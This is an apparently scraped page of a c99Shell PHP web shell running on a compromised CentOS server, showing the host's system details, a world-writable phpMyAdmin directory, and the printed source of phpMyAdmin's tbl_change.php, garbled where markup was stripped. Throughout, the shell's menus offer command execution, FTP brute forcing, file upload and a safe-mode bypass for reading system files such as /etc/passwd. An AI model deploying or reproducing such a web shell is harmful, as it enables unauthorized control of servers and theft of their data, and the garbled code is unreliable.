110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/phpMyAdmin/ drwxrwxrwx Free 52.61 GB of 127.8 GB (41.16%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/phpMyAdmin/ drwxrwxrwx
Free 52.61 GB of 127.8 GB (41.16%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: tbl_change.php (44.71 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

= 40100) { $comments_map = PMA_getComments($db, $table); } } /** * Displays top menu links */ require_once('./libraries/tbl_properties_links.inc.php'); /** * Get the analysis of SHOW CREATE TABLE for this table */ $show_create_table = PMA_DBI_fetch_value( 'SHOW CREATE TABLE ' . PMA_backquote($db) . '.' . PMA_backquote($table), 0, 1 ); $analyzed_sql = PMA_SQP_analyze( PMA_SQP_parse( $show_create_table ) ); unset($show_create_table); /** * Get the list of the fields of the current table */ PMA_DBI_select_db($db); $table_def = PMA_DBI_query('SHOW FIELDS FROM ' . PMA_backquote($table) . ';', null, PMA_DBI_QUERY_STORE); if (isset($primary_key)) { if (is_array($primary_key)) { $primary_key_array = $primary_key; } else { $primary_key_array = array(0 => $primary_key); } $row = array(); $result = array(); foreach ($primary_key_array AS $rowcount => $primary_key) { $local_query = 'SELECT * FROM ' . PMA_backquote($table) . ' WHERE ' . $primary_key . ';'; $result[$rowcount] = PMA_DBI_query($local_query, null, PMA_DBI_QUERY_STORE); $row[$rowcount] = PMA_DBI_fetch_assoc($result[$rowcount]); $primary_keys[$rowcount] = $primary_key; // No row returned if (!$row[$rowcount]) { unset($row[$rowcount]); unset($primary_key_array[$rowcount]); $goto_cpy = $goto; $goto = 'tbl_properties.php?' . PMA_generate_common_url($db, $table) . '&$show_query=1' . '&sql_query=' . urlencode($local_query); if (isset($sql_query)) { $sql_query_cpy = $sql_query; unset($sql_query); } $sql_query = $local_query; PMA_showMessage($strEmptyResultSet); $goto = $goto_cpy; unset($goto_cpy); if (isset($sql_query_cpy)) { $sql_query = $sql_query_cpy; unset($sql_query_cpy); } echo "\n"; require_once('./libraries/footer.inc.php'); } // end if (no record returned) } } else { $result = PMA_DBI_query('SELECT * FROM ' . PMA_backquote($table) . ' LIMIT 1;', null, PMA_DBI_QUERY_STORE); unset($row); } // // retrieve keys into foreign fields, if any $cfgRelation = PMA_getRelationsParam(); $foreigners = ($cfgRelation['relwork'] ? PMA_getForeigners($db, $table) : FALSE); /** * Displays the form */ // loic1: autocomplete feature of IE kills the "onchange" event handler and it // must be replaced by the "onpropertychange" one in this case $chg_evt_handler = (PMA_USR_BROWSER_AGENT == 'IE' && PMA_USR_BROWSER_VER >= 5) ? 'onpropertychange' : 'onchange'; // Had to put the URI because when hosted on an https server, // some browsers send wrongly this form to the http server. ?>

> '; } else { $iconic_spacer = ''; } $titles['Browse'] = $iconic_spacer . '

'; if ($propicon == 'both') { $titles['Browse'] .= ' ' . $strBrowseForeignValues . ''; } } else { $titles['Browse'] = $strBrowseForeignValues; } // Set if we passed the first timestamp field $timestamp_seen = 0; $fields_cnt = PMA_DBI_num_rows($table_def); // Set a flag here because the 'if' would not be valid in the loop // if we set a value in some field $insert_mode = (!isset($row) ? TRUE : FALSE); if ($insert_mode) { $loop_array = array(); for ($i = 0; $i < $cfg['InsertRows']; $i++) $loop_array[] = FALSE; } else { $loop_array = $row; } while ($trow = PMA_DBI_fetch_assoc($table_def)) { $trow_table_def[] = $trow; } $tabindex = 0; $tabindex_for_function = +1000; $tabindex_for_null = +2000; $tabindex_for_value = 0; $o_rows = 0; $biggest_max_file_size = 0; foreach ($loop_array AS $vrowcount => $vrow) { if ($vrow === FALSE) { unset($vrow); } if ($insert_mode) { $jsvkey = $vrowcount; $browse_foreigners_uri = '&pk=' . $vrowcount; } else { $jsvkey = urlencode($primary_keys[$vrowcount]); $browse_foreigners_uri = '&pk=' . urlencode($primary_keys[$vrowcount]); } $vkey = '[multi_edit][' . $jsvkey . ']'; $vresult = (isset($result) && is_array($result) && isset($result[$vrowcount]) ? $result[$vrowcount] : $result); if ($insert_mode && $vrowcount > 0) { echo ''; echo '' . $strIgnore . '
' . "\n"; } ?> ' . $strFunction . '' . "\n"; } ?> and instead, // but it didn't worked because of the ) if ((($o_rows * $fields_cnt + $i) % 15 == 0) && ($i + $o_rows != 0)) { ?> d [Type] => datetime [Null] => YES [Key] => [Extra] => [True_Type] => datetime ) // but, look what we get if we switch to iso: (Default is NULL) // Array ( [Field] => d [Type] => datetime [Null] => YES [Key] => [Default] => [Extra] => [True_Type] => datetime ) // so I force a NULL into it (I don't think it's possible // to have an empty default value for DATETIME) // then, the "if" after this one will work if ($row_table_def['Type'] == 'datetime' && !isset($row_table_def['Default']) && isset($row_table_def['Null']) && $row_table_def['Null'] == 'YES') { $row_table_def['Default'] = null; } if ($row_table_def['Type'] == 'datetime' && (!isset($row_table_def['Default'])) && (!is_null($row_table_def['Default']))) { // INSERT case if ($insert_mode) { if (isset($vrow)) { $vrow[$rowfield] = date('Y-m-d H:i:s', time()); } else { $vrow = array($rowfield => date('Y-m-d H:i:s', time())); } } // UPDATE case with an empty and not NULL value under PHP4 elseif (empty($vrow[$rowfield]) && is_null($vrow[$rowfield])) { $vrow[$rowfield] = date('Y-m-d H:i:s', time()); } // end if... elseif... } $len = (preg_match('@float|double@', $row_table_def['Type'])) ? 100 : PMA_DBI_field_len($vresult, $i); $first_timestamp = 0; $field_name = htmlspecialchars($field); if (isset($comments_map[$field])) { $field_name = '' . $field_name . ''; } $bgcolor = ($i % 2) ? $cfg['BgcolorOne'] : $cfg['BgcolorTwo']; ?> '; } else { // loic1: display default values if (!isset($row_table_def['Default'])) { $row_table_def['Default'] = ''; $real_null_value = TRUE; $data = ''; } else { $data = $row_table_def['Default']; } $special_chars = htmlspecialchars($row_table_def['Default']); $backup_field = ''; } $idindex = ($o_rows * $fields_cnt) + $i + 1; $tabindex = (($idindex - 1) * 3) + 1; // The function column // ------------------- // Change by Bernard M. Piller // We don't want binary data to be destroyed // Note: from the MySQL manual: "BINARY doesn't affect how the column is // stored or retrieved" so it does not mean that the contents is // binary if ($cfg['ShowFunctionFields']) { if (($cfg['ProtectBinary'] && $is_blob && !$is_upload) || ($cfg['ProtectBinary'] == 'all' && $is_binary)) { echo ' ' . "\n"; } elseif (strstr($row_table_def['True_Type'], 'enum') || strstr($row_table_def['True_Type'], 'set')) { echo ' ' . "\n"; } else { ?> ' . "\n"; if (!(($cfg['ProtectBinary'] && $is_blob) || ($cfg['ProtectBinary'] == 'all' && $is_binary)) && $row_table_def['Null'] == 'YES') { echo ' ' . "\n"; echo ' 20) { $onclick .= '1, '; } else { $onclick .= '2, '; } } elseif (strstr($row_table_def['True_Type'], 'set')) { $onclick .= '3, '; } elseif ($foreigners && isset($foreigners[$field])) { $onclick .= '4, '; } else { $onclick .= '5, '; } $onclick .= '\'' . urlencode($field) . '\', \'' . md5($field) . '\', \'' . $vkey . '\'); this.checked = true}; return true" />' . "\n"; echo $onclick; } else { echo ' ' . "\n"; } echo ' ' . "\n"; // The value column (depends on type) // ---------------- require('./libraries/get_foreign.lib.php'); if (isset($foreign_link) && $foreign_link == true) { ?> 32000) { echo ' ' . "\n"; } } elseif ($type == 'enum') { $enum = PMA_getEnumSetOptions($row_table_def['Type']); $enum_cnt = count($enum); ?> // We don't want binary data destroyed elseif ($is_binary || $is_blob) { if (($cfg['ProtectBinary'] && $is_blob) || ($cfg['ProtectBinary'] == 'all' && $is_binary)) { echo "\n"; ?> '; } // end elseif ( binary or blob) else { // For char or varchar, respect the maximum length (M); for other // types (int or float), the length is not a limit on the values that // can be entered, so let's be generous (20) (we could also use the // real limits for each numeric type) // 2004-04-07, it turned out that 20 was not generous enough // for the maxlength if ($is_char) { $fieldsize = (($len > 40) ? 40 : $len); $maxlength = $len; } else { $fieldsize = 20; $maxlength = 99; } // end if... else... echo "\n"; ?>
'; } // end foreach on multi-edit ?>



align="center" bgcolor="">	>	' . $strBinary . '	--		="return unNullify('', '')" tabindex="" id="field__3" value="" />
="return unNullify('<?php echo urlencode($field); ?>', '<?php echo $jsvkey; ?>')" tabindex="<?php echo ($tabindex + $tabindex_for_value); ?>"><?php echo $special_chars; ?>				="return unNullify('<?php echo urlencode($field); ?>', '<?php echo $jsvkey; ?>')" tabindex="<?php echo ($tabindex + $tabindex_for_value); ?>"><?php echo $special_chars; ?>	' . $strTextAreaLength . '	20) { echo "\n"; ?> '; echo '' . htmlspecialchars($enum_atom) . '' . "\n"; } // end for } // end else echo "\n"; ?>	="return unNullify('<?php echo urlencode($field); ?>', '<?php echo $jsvkey; ?>')" tabindex="<?php echo ($tabindex + $tabindex_for_value); ?>" ><?php echo $special_chars; ?> 40) ? 40 : $len); $maxlength = $len; } echo "\n"; ?>	="return unNullify('', '')" tabindex="" id="field__3" /> '; echo ' '; // find maximum upload size, based on field type // FIXME: with functions this is not so easy, as you can basically process any data with function like MD5 $max_field_sizes = array( 'tinyblob' => '256', 'blob' => '65536', 'mediumblob' => '16777216', 'longblob' => '4294967296'); // yeah, really $this_field_max_size = $max_upload_size; // from PHP max if ($this_field_max_size > $max_field_sizes[$type]) { $this_field_max_size = $max_field_sizes[$type]; } echo PMA_displayMaximumUploadSize($this_field_max_size) . "\n"; // do not generate here the MAX_FILE_SIZE, because we should // put only one in the form to accommodate the biggest field if ($this_field_max_size > $biggest_max_file_size) { $biggest_max_file_size = $this_field_max_size; } } if (!empty($cfg['UploadDir'])) { $files = PMA_getFileSelectOptions(PMA_userDir($cfg['UploadDir'])); if ($files === FALSE) { echo ' ' . $strError . ' ' . "\n"; echo ' ' . $strWebServerUploadDirectoryError . "\n"; } elseif (!empty($files)) { echo " \n"; echo ' ' . $strOr . '' . ' ' . $strWebServerUploadDirectory . ': ' . "\n"; echo ' ' . "\n"; } } // end if (web-server upload directory) echo '	="return unNullify('<?php echo urlencode($field); ?>', '<?php echo $jsvkey; ?>')" tabindex="<?php echo ($tabindex + $tabindex_for_value); ?>" ><?php echo $special_chars; ?> ="return unNullify('', '')" tabindex="" id="field__3" />

0) { echo ' ' . PMA_generateHiddenMaxFileSize($biggest_max_file_size) . "\n"; } ?>

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0055 ]--